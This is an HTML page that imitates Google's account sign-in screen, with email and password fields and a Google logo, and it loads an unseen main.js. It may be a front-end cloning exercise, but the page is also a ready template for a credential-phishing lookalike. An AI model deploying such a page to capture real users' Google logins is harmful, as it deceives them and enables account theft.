<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google Form</title>
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet"
        href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;600;700&display=swap">
        <link rel="stylesheet"
        href="https://fonts.googleapis.com/css2?family=Productsans:wght@300;400;500;600;700&display=swap">
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha512-1sCRPdkRXhBV2PBLUdRb4tMg1w2YPf37qatUFeS7zlBy7jJI8Lf4VHwWfZZfpXtYSLy85pkm9GaYVYMfw5BC1A==" crossorigin="anonymous" referrerpolicy="no-referrer" />
        <script src="https://kit.fontawesome.com/369c1756a5.js" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>

<body>
    <div class="container">
        <div class="logo">
            <img src="google.png" alt="logo.png">
        </div>
        <div class="formBox">
            <h1>Sign in</h1>
            <span>Use your Google Account</span>
            <form>
                <div class="input-box">
                    <input type="email" name="email" id="email" class="input-field" required autofocus autocomplete="off"> 
                    <label for="email-field" class="placeholder">Email or Phone</label>
                </div>
                <div class="input-box">
                    <input type="password" name="password" id="password" class="input-field" required> 
                    <label for="password-field" class="placeholder">Enter your Password</label>
                </div>
                <a href="#" class="forgot">Forgot email?</a>
                <div class="button">
                <a href="#" class="create-account">Create account</a>
                    <button class="sign-in">Next</button>
                </div>
            </form>
        </div>
    </div>
    <script src="main.js"></script>
</body>

</html>